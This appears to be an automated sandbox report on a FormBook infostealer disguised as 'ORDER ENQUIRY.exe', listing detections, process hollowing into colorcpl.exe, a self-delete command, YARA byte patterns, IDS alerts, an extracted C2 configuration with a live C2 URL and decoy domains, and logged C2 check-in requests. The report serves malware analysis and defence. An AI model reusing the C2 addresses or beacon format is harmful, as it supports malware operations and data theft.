Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ORDER ENQUIRY.exe

Overview

General Information

Sample name:ORDER ENQUIRY.exe
Analysis ID:1523220
MD5:754fa726ba767c17ebbce69e967d40ca
SHA1:b011ef478a435e685c3180d10c1c25bbc58ce105
SHA256:79bcad797129c0be508de0fe7b0462b1aaffbafa74a4e7019a4561deb674f4bd
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • ORDER ENQUIRY.exe (PID: 3032 cmdline: "C:\Users\user\Desktop\ORDER ENQUIRY.exe" MD5: 754FA726BA767C17EBBCE69E967D40CA)
    • ORDER ENQUIRY.exe (PID: 4564 cmdline: "C:\Users\user\Desktop\ORDER ENQUIRY.exe" MD5: 754FA726BA767C17EBBCE69E967D40CA)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • colorcpl.exe (PID: 3944 cmdline: "C:\Windows\SysWOW64\colorcpl.exe" MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
          • cmd.exe (PID: 6128 cmdline: /c del "C:\Users\user\Desktop\ORDER ENQUIRY.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.avai66.xyz/hy08/"], "decoy": ["weazc.top", "servoceimmpajhnuz.info", "vqemkdhi.xyz", "wergol.com", "spa-mk.com", "rtpsid88.life", "tatetits.fun", "raidsa.xyz", "suojiansuode.net", "jointhejunction.com", "wudai.net", "typeboot.shop", "mksport-app.com", "miocloud.ovh", "taipan77pandan.com", "wwwhg58a.com", "khuahamiksai31.pro", "carpedatumllc.net", "safebinders.com", "krx21.com", "qyld9yp.icu", "ischover.com", "lineagegenetics.com", "breakfreesoar.com", "os9user.com", "m1rmen.tech", "cttlca.click", "privacysift.com", "gilggak.com", "horxncnt.xyz", "strategyguys.info", "egyptflickcasino.online", "5536canoga.com", "ilpradio.com", "shahgoldentravel.com", "autismtour.com", "alivioquantico.com", "valo.games", "manhuafeifei.xyz", "bihungoreng22.click", "btc158.com", "500728.party", "hemcksqa.net", "agclcdstf460.xyz", "flywatchsecurity.com", "bedazzledbabe.com", "btcrenaissance.net", "mavincrm.com", "65618.asia", "axgventures.com", "arelenegrace.com", "cryptosmartguide.xyz", "bodgion.xyz", "21556934.com", "cheaplaptops.biz", "v2e5g.xyz", "yc23w.top", "24khome.com", "cdncf.xyz", "marabudigital.online", "3sqre.lol", "entgab679y.top", "b10a.shop", "mekanbahis104.com"]}
SourceRuleDescriptionAuthorStrings
00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18839:$sqlite3step: 68 34 1C 7B E1
      • 0x1894c:$sqlite3step: 68 34 1C 7B E1
      • 0x18868:$sqlite3text: 68 38 2A 90 C5
      • 0x1898d:$sqlite3text: 68 38 2A 90 C5
      • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 25 entries
      SourceRuleDescriptionAuthorStrings
      3.2.ORDER ENQUIRY.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.ORDER ENQUIRY.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.ORDER ENQUIRY.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          3.2.ORDER ENQUIRY.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          3.2.ORDER ENQUIRY.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a39:$sqlite3step: 68 34 1C 7B E1
          • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a68:$sqlite3text: 68 38 2A 90 C5
          • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-01T10:05:00.616006+020020314531Malware Command and Control Activity Detected192.168.2.549724151.101.0.11980TCP
          2024-10-01T10:05:00.616006+020020314531Malware Command and Control Activity Detected192.168.2.5497223.33.130.19080TCP
          2024-10-01T10:05:00.616006+020020314531Malware Command and Control Activity Detected192.168.2.549723154.197.185.22080TCP
          2024-10-01T10:06:02.624066+020020314531Malware Command and Control Activity Detected192.168.2.549719199.59.243.22780TCP
          2024-10-01T10:06:22.816992+020020314531Malware Command and Control Activity Detected192.168.2.549720154.221.68.22980TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.avai66.xyz/hy08/"], "decoy": ["weazc.top", "servoceimmpajhnuz.info", "vqemkdhi.xyz", "wergol.com", "spa-mk.com", "rtpsid88.life", "tatetits.fun", "raidsa.xyz", "suojiansuode.net", "jointhejunction.com", "wudai.net", "typeboot.shop", "mksport-app.com", "miocloud.ovh", "taipan77pandan.com", "wwwhg58a.com", "khuahamiksai31.pro", "carpedatumllc.net", "safebinders.com", "krx21.com", "qyld9yp.icu", "ischover.com", "lineagegenetics.com", "breakfreesoar.com", "os9user.com", "m1rmen.tech", "cttlca.click", "privacysift.com", "gilggak.com", "horxncnt.xyz", "strategyguys.info", "egyptflickcasino.online", "5536canoga.com", "ilpradio.com", "shahgoldentravel.com", "autismtour.com", "alivioquantico.com", "valo.games", "manhuafeifei.xyz", "bihungoreng22.click", "btc158.com", "500728.party", "hemcksqa.net", "agclcdstf460.xyz", "flywatchsecurity.com", "bedazzledbabe.com", "btcrenaissance.net", "mavincrm.com", "65618.asia", "axgventures.com", "arelenegrace.com", "cryptosmartguide.xyz", "bodgion.xyz", "21556934.com", "cheaplaptops.biz", "v2e5g.xyz", "yc23w.top", "24khome.com", "cdncf.xyz", "marabudigital.online", "3sqre.lol", "entgab679y.top", "b10a.shop", "mekanbahis104.com"]}
          Source: ORDER ENQUIRY.exeVirustotal: Detection: 50%Perma Link
          Source: ORDER ENQUIRY.exeReversingLabs: Detection: 57%
          Source: Yara matchFile source: 3.2.ORDER ENQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: ORDER ENQUIRY.exeJoe Sandbox ML: detected
          Source: ORDER ENQUIRY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: ORDER ENQUIRY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: gTwj.pdb source: ORDER ENQUIRY.exe
          Source: Binary string: colorcpl.pdbGCTL source: ORDER ENQUIRY.exe, 00000003.00000002.2158318122.0000000001980000.00000040.10000000.00040000.00000000.sdmp, ORDER ENQUIRY.exe, 00000003.00000002.2157829388.0000000001628000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4550455934.00000000000E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: colorcpl.pdb source: ORDER ENQUIRY.exe, 00000003.00000002.2158318122.0000000001980000.00000040.10000000.00040000.00000000.sdmp, ORDER ENQUIRY.exe, 00000003.00000002.2157829388.0000000001628000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000005.00000002.4550455934.00000000000E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: ORDER ENQUIRY.exe, 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2156878359.000000000450B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2164752594.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: ORDER ENQUIRY.exe, ORDER ENQUIRY.exe, 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000005.00000003.2156878359.000000000450B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2164752594.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: gTwj.pdbSHA256 source: ORDER ENQUIRY.exe
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 4x nop then jmp 07735905h0_2_07735850
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 4x nop then pop ebx3_2_00407B1A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop ebx5_2_02877B1C

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49720 -> 154.221.68.229:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49720 -> 154.221.68.229:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49720 -> 154.221.68.229:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49719 -> 199.59.243.227:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49719 -> 199.59.243.227:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49719 -> 199.59.243.227:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49724 -> 151.101.0.119:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49724 -> 151.101.0.119:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49724 -> 151.101.0.119:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49722 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49723 -> 154.197.185.220:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49722 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49722 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49723 -> 154.197.185.220:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49723 -> 154.197.185.220:80
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.227 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.221.68.229 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: Malware configuration extractorURLs: www.avai66.xyz/hy08/
          Source: DNS query: www.raidsa.xyz
          Source: DNS query: www.manhuafeifei.xyz
          Source: DNS query: www.horxncnt.xyz
          Source: DNS query: www.avai66.xyz
          Source: global trafficHTTP traffic detected: GET /hy08/?GxlX=76ARE7XQpOejeJ4AXgyv9+sF91x02cjLA3TRMrZhHEY9TEByi8vF89DJ/cM7klw0Rkk8&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.wergol.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hy08/?GxlX=7jBziBoNeaZ0YBYCWuyuiMj/CYrZJe3GZSyGqEoVCgHfq7+BCveVTDnkVKPyAZoe4JtD&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.os9user.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hy08/?GxlX=NioFYaTFIvMJJp+7ScZBWsfgKUzei2ToAwpis545Pph8LP+guwZTQ54AM67XLgRQsCTP&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.mksport-app.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hy08/?GxlX=30efH6i7Pz0nBTvTyaS27TzcwE/B1ZxvPeuscSnkTZUQOLn/CwAUU0gdfCR3da34oWtV&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.raidsa.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hy08/?GxlX=J+fUwLE1cqwAibtDCdy9vP1S8G5oesFXJDqwJASvo9tHD3nGP7GVc6KavM+iw+vNh4vC&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.horxncnt.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hy08/?GxlX=KVcwHz5T5zR/xh5veJhw4peaZs963mOOXmZZz4i4ompoXg80SoxOBoRtYZYOL4s8KZ+L&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.flywatchsecurity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
          Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 4_2_10697F82 getaddrinfo,setsockopt,recv,4_2_10697F82
          Source: global trafficHTTP traffic detected: GET /hy08/?GxlX=76ARE7XQpOejeJ4AXgyv9+sF91x02cjLA3TRMrZhHEY9TEByi8vF89DJ/cM7klw0Rkk8&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.wergol.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hy08/?GxlX=7jBziBoNeaZ0YBYCWuyuiMj/CYrZJe3GZSyGqEoVCgHfq7+BCveVTDnkVKPyAZoe4JtD&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.os9user.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hy08/?GxlX=NioFYaTFIvMJJp+7ScZBWsfgKUzei2ToAwpis545Pph8LP+guwZTQ54AM67XLgRQsCTP&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.mksport-app.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hy08/?GxlX=30efH6i7Pz0nBTvTyaS27TzcwE/B1ZxvPeuscSnkTZUQOLn/CwAUU0gdfCR3da34oWtV&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.raidsa.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hy08/?GxlX=J+fUwLE1cqwAibtDCdy9vP1S8G5oesFXJDqwJASvo9tHD3nGP7GVc6KavM+iw+vNh4vC&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.horxncnt.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hy08/?GxlX=KVcwHz5T5zR/xh5veJhw4peaZs963mOOXmZZz4i4ompoXg80SoxOBoRtYZYOL4s8KZ+L&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.flywatchsecurity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.wergol.com
          Source: global trafficDNS traffic detected: DNS query: www.os9user.com
          Source: global trafficDNS traffic detected: DNS query: www.mksport-app.com
          Source: global trafficDNS traffic detected: DNS query: www.raidsa.xyz
          Source: global trafficDNS traffic detected: DNS query: www.manhuafeifei.xyz
          Source: global trafficDNS traffic detected: DNS query: www.horxncnt.xyz
          Source: global trafficDNS traffic detected: DNS query: www.cttlca.click
          Source: global trafficDNS traffic detected: DNS query: www.flywatchsecurity.com
          Source: global trafficDNS traffic detected: DNS query: www.21556934.com
          Source: global trafficDNS traffic detected: DNS query: www.valo.games
          Source: global trafficDNS traffic detected: DNS query: www.avai66.xyz
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 01 Oct 2024 08:05:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 01 Oct 2024 08:05:56 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Juvm0SPz3sAHG%2FBUT138ZSlgrVuD0SkVy1HOtfpCxsNHwst3jIY1Gw7vmUFRxncMYqglCz91MflmtJTsHRmOqWUnQyNLqAjFd7w4qYWs%2FwiEr60fOvuRMlHGszd6KVMM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=9.999752X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 8cbaf2f93d32188d-EWRData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="C
          Source: explorer.exe, 00000004.00000000.2114025669.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000004.00000000.2099752489.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4550702238.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
          Source: explorer.exe, 00000004.00000000.2114025669.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000004.00000000.2114025669.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
